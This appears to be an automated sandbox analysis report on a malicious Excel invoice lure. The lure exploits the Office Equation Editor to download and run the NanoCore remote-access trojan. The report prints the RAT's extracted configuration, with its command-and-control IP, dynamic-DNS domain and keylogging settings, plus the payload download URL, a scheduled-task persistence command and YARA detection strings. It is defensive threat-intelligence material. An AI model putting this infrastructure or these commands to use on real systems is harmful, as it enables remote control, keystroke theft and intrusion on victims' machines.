Play interactive tour

Edit tour

Analysis Report SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Overview

General Information

Sample Name:	SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Analysis ID:	385193
MD5:	216f2652001700d1f7ac1109a508ce2d
SHA1:	82d3a0b7bb096d03f9f1a4de5444c216849d576b
SHA256:	9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 1320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2480 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3CBEB3E732B11954572B3EE6755242C)

schtasks.exe (PID: 2676 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

RegSvcs.exe (PID: 2696 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

smtpsvc.exe (PID: 1296 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1ff715:$x1: NanoCore.ClientPluginHost 0x231f35:$x1: NanoCore.ClientPluginHost 0x1ff752:$x2: IClientNetworkHost 0x231f72:$x2: IClientNetworkHost 0x203285:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x235aa5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1ff47d:$a: NanoCore 0x1ff48d:$a: NanoCore 0x1ff6c1:$a: NanoCore 0x1ff6d5:$a: NanoCore 0x1ff715:$a: NanoCore 0x231c9d:$a: NanoCore 0x231cad:$a: NanoCore 0x231ee1:$a: NanoCore 0x231ef5:$a: NanoCore 0x231f35:$a: NanoCore 0x1ff4dc:$b: ClientPlugin 0x1ff6de:$b: ClientPlugin 0x1ff71e:$b: ClientPlugin 0x231cfc:$b: ClientPlugin 0x231efe:$b: ClientPlugin 0x231f3e:$b: ClientPlugin 0x15578d:$c: ProjectData 0x1ff603:$c: ProjectData 0x231e23:$c: ProjectData 0x20000a:$d: DESCrypto 0x23282a:$d: DESCrypto
00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x233d5:$a: NanoCore 0x2342e:$a: NanoCore 0x2346b:$a: NanoCore 0x234e4:$a: NanoCore 0x36b8f:$a: NanoCore 0x36ba4:$a: NanoCore 0x36bd9:$a: NanoCore 0x4f65b:$a: NanoCore 0x4f670:$a: NanoCore 0x4f6a5:$a: NanoCore 0x23437:$b: ClientPlugin 0x23474:$b: ClientPlugin 0x23d72:$b: ClientPlugin 0x23d7f:$b: ClientPlugin 0x3694b:$b: ClientPlugin 0x36966:$b: ClientPlugin 0x36996:$b: ClientPlugin 0x36bad:$b: ClientPlugin 0x36be2:$b: ClientPlugin 0x4f417:$b: ClientPlugin 0x4f432:$b: ClientPlugin
00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
Process Memory Space: vbc.exe PID: 2480	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3cb4a:$x1: NanoCore.ClientPluginHost 0x5b54c:$x1: NanoCore.ClientPluginHost 0x3cbab:$x2: IClientNetworkHost 0x5b5ad:$x2: IClientNetworkHost 0x41fb0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4ff22:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x609b2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6e924:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: vbc.exe PID: 2480	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2480	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: vbc.exe PID: 2480	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3c64f:$a: NanoCore 0x3c66b:$a: NanoCore 0x3c7c6:$a: NanoCore 0x3c7d5:$a: NanoCore 0x3caae:$a: NanoCore 0x3cada:$a: NanoCore 0x3cb4a:$a: NanoCore 0x4c58c:$a: NanoCore 0x4c59e:$a: NanoCore 0x4c5da:$a: NanoCore 0x5b051:$a: NanoCore 0x5b06d:$a: NanoCore 0x5b1c8:$a: NanoCore 0x5b1d7:$a: NanoCore 0x5b4b0:$a: NanoCore 0x5b4dc:$a: NanoCore 0x5b54c:$a: NanoCore 0x6af8e:$a: NanoCore 0x6afa0:$a: NanoCore 0x6afdc:$a: NanoCore 0x3c6f6:$b: ClientPlugin
Process Memory Space: RegSvcs.exe PID: 2696	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x33ac8:$x1: NanoCore.ClientPluginHost 0xdd104:$x1: NanoCore.ClientPluginHost 0x31f8c0:$x1: NanoCore.ClientPluginHost 0x32547f:$x1: NanoCore.ClientPluginHost 0x336309:$x1: NanoCore.ClientPluginHost 0x3e5131:$x1: NanoCore.ClientPluginHost 0x405230:$x1: NanoCore.ClientPluginHost 0x33b0d:$x2: IClientNetworkHost 0xdd12a:$x2: IClientNetworkHost 0x31f8e6:$x2: IClientNetworkHost 0x3254c4:$x2: IClientNetworkHost 0x33634e:$x2: IClientNetworkHost 0x3e5192:$x2: IClientNetworkHost 0x405256:$x2: IClientNetworkHost 0x3ea597:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3f8509:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegSvcs.exe PID: 2696	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2696	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x33a42:$a: NanoCore 0x33a6f:$a: NanoCore 0x33ac8:$a: NanoCore 0x3b2d7:$a: NanoCore 0x3b2ea:$a: NanoCore 0x3b31c:$a: NanoCore 0x805e0:$a: NanoCore 0xce3fe:$a: NanoCore 0xce93e:$a: NanoCore 0xce962:$a: NanoCore 0xdcff6:$a: NanoCore 0xdd097:$a: NanoCore 0xdd104:$a: NanoCore 0xdd1c5:$a: NanoCore 0xde096:$a: NanoCore 0xde0e9:$a: NanoCore 0xde122:$a: NanoCore 0xde195:$a: NanoCore 0x31f7b2:$a: NanoCore 0x31f853:$a: NanoCore 0x31f8c0:$a: NanoCore
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.380d42c.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.380d42c.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.380d42c.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.26b2ea0.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.2.vbc.exe.3890588.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x429ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x429ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4651d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3890588.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x42725:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x429ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x43fe6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x43fda:$s2: FileCommand 0x1266b:$s3: PipeExists 0x44e8b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4ac42:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x429d7:$s5: IClientLoggingHost
4.2.vbc.exe.3890588.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3890588.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42715:$a: NanoCore 0x42725:$a: NanoCore 0x42959:$a: NanoCore 0x4296d:$a: NanoCore 0x429ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42774:$b: ClientPlugin 0x42976:$b: ClientPlugin 0x429b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x4289b:$c: ProjectData 0x10a82:$d: DESCrypto 0x432a2:$d: DESCrypto 0x1844e:$e: KeepAlive
7.2.RegSvcs.exe.27d1644.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
7.2.RegSvcs.exe.27d1644.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
7.2.RegSvcs.exe.840000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.840000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.840000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3890588.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3890588.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.vbc.exe.3890588.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3890588.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.2.RegSvcs.exe.38085f6.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d0af:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0dc:$x2: IClientNetworkHost
7.2.RegSvcs.exe.38085f6.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d0af:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e18a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0c9:$s5: IClientLoggingHost
7.2.RegSvcs.exe.38085f6.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.38085f6.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d065:$a: NanoCore 0x2d07a:$a: NanoCore 0x2d0af:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce21:$b: ClientPlugin 0x2ce3c:$b: ClientPlugin
7.2.RegSvcs.exe.844629.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
7.2.RegSvcs.exe.844629.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
7.2.RegSvcs.exe.844629.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.5c0000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
7.2.RegSvcs.exe.5c0000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
7.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.RegSvcs.exe.3811a55.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c50:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c7d:$x2: IClientNetworkHost
7.2.RegSvcs.exe.3811a55.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c50:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d2b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c6a:$s5: IClientLoggingHost
7.2.RegSvcs.exe.3811a55.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.840000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.840000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.840000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.380d42c.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28279:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x282a6:$x2: IClientNetworkHost
7.2.RegSvcs.exe.380d42c.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28279:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29354:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28293:$s5: IClientLoggingHost
7.2.RegSvcs.exe.380d42c.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.37494e8.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x15722d:$x1: NanoCore.ClientPluginHost 0x189a4d:$x1: NanoCore.ClientPluginHost 0x15726a:$x2: IClientNetworkHost 0x189a8a:$x2: IClientNetworkHost 0x15ad9d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x18d5bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.37494e8.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.37494e8.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x156f95:$a: NanoCore 0x156fa5:$a: NanoCore 0x1571d9:$a: NanoCore 0x1571ed:$a: NanoCore 0x15722d:$a: NanoCore 0x1897b5:$a: NanoCore 0x1897c5:$a: NanoCore 0x1899f9:$a: NanoCore 0x189a0d:$a: NanoCore 0x189a4d:$a: NanoCore 0x156ff4:$b: ClientPlugin 0x1571f6:$b: ClientPlugin 0x157236:$b: ClientPlugin 0x189814:$b: ClientPlugin 0x189a16:$b: ClientPlugin 0x189a56:$b: ClientPlugin 0xad2a5:$c: ProjectData 0x15711b:$c: ProjectData 0x18993b:$c: ProjectData 0x157b22:$d: DESCrypto 0x18a342:$d: DESCrypto
Click to see the 37 entries

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 13.235.115.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2480, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', ProcessId: 2676

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://covid19vaccinations.hopto.org/nano.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp

